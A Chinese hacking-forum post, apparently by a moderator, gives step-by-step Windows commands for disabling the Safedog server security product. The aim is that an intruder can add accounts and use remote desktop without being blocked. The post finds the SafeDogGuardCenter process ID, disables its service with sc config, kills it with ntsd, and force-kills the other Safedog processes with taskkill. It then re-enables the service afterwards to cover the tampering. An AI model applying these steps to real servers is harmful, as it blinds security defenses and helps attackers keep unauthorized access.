黑帽联盟

 找回密码
 会员注册
查看: 1275|回复: 1

[系统安全] 安全狗下加用户的又一淫荡技巧

[复制链接]

148

主题

9

听众

337

积分

版主

Rank: 7Rank: 7Rank: 7

  • TA的每日心情
    擦汗
    2018-6-6 11:33
  • 签到天数: 348 天

    [LV.8]以坛为家I

    上次发了安全狗下加用户的另一方法,据说不够风骚…所以这次要淫荡一点 ,方法同样很简单,不过不知道有没有人发过

    上次发了安全狗下加用户的另一方法,据说不够风骚…所以这次要淫荡一点

    方法同样很简单,不过不知道有没有人发过。。

    PS: 转载请不要注明作者
    0×01 测试环境:
    安全狗的进程:
    201309011805175.jpg


    .安全狗的服务
    201309011805176.jpg


    .开启远程桌面守护
    201309011805177.jpg


    .远程登录测试:
    201309011805178.jpg


    .安全狗拦截
    201309011805179.jpg


    0×02 直入主题:
    命令行下操作


      tasklist |find “Safe”


    2013090118051710.jpg

    最后一个进程SafeDogGuardCenter.exe是关键,记下它的PID:1032
    然后接连两个指令


      sc config SafedogGuardCenter start= disabled


    2013090118051711.jpg


      ntsd -c q -pid 1032


    2013090118051712.jpg

    1032是刚才记下的SafeDogGuardCenter.exe 的pid,这个进程是服务器守护的核心,没了它,安全狗的服务器守护将没有任何作用

    效果:
    2013090118051713.jpg
    2013090118051714.jpg


    然后?然后就没有然后了~现在我们已经可以为所欲为了
    真想看然后?那我们就来调戏一下狗狗咯
    2013090118051715.jpg
    折腾一下狗狗的进程


      taskkill /f /t /im SafeDogUpdateCenter.exe /im SafeDogSiteIIS.exe /im SafeDogServerUI.exe


    2013090118051716.jpg


    0×03 总结
    旨在不依靠任何外部程序,终结安全狗的守护功能。
    其中使用到的NTSD命令是系统自带的【2008/win7 以上被微软删减了,需要自己上传[XP的NTSD.EXE在system32目录下]】
    安全狗在网站的安全上做的还可以,对自身的安全却完全没有考虑,无力吐槽。。
    核心命令就两句话,顺序不能出错


      sc config SafedogGuardCenter start= disabled


      ntsd -c q -pid 1032

    如果不先把安全狗的服务停掉,它就会不断的重新启动[两秒重启一次我会说?]
    手尾:退出远程登录之后,最好把狗狗的服务改回来


      sc config SafedogGuardCenter start= auto


    然后狗狗的服务会自己恢复原状的


    852

    主题

    38

    听众

    3168

    积分

    白金VIP

    Rank: 8Rank: 8

  • TA的每日心情
    开心
    2024-3-7 12:52
  • 签到天数: 1538 天

    [LV.Master]伴坛终老

    安全狗只要绕过它的规则就好
    来自安卓客户端来自安卓客户端
    勿忘初心,方得始终!
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部